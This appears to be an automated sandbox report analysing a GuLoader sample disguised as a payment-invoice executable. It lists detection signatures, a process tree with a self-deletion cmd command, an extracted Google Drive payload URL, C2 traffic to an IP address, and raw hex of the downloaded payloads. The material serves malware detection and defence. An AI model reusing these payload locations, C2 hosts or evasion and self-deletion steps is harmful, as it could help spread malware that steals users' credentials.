Loading ...

Play interactive tourEdit tour

Windows Analysis Report usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe

Overview

General Information

Sample Name:usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Analysis ID:482656
MD5:257e1f881863b023fcddaedb2ac22e68
SHA1:9cff8e3a2a2cb5ad3acba8d4260b2581e0098ac9
SHA256:856d455d07bff404e39b422f1ad0bbff9397707c86670dbc1134729b44a8c868
Tags:exeguloader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe (PID: 3952 cmdline: 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: 257E1F881863B023FCDDAEDB2AC22E68)
    • usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: 257E1F881863B023FCDDAEDB2AC22E68)
      • cmd.exe (PID: 1768 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6968 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeVirustotal: Detection: 28%Perma Link
    Machine Learning detection for sampleShow sources
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeJoe Sandbox ML: detected
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknownHTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
    Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
    Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
    Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
    Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
    Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
    Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=10smU8Pga
    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /marinolumuop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telete.in
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.158.245.117
    Source: global trafficHTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
    Source: global trafficHTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 55359Host: 94.158.245.117
    Source: Joe Sandbox ViewIP Address: 195.201.225.248 195.201.225.248
    Source: Joe Sandbox ViewIP Address: 94.158.245.117 94.158.245.117
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Sep 2021 23:07:19 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1s-docs.googleusercontent.comConnection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Sep 2021 23:07:24 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
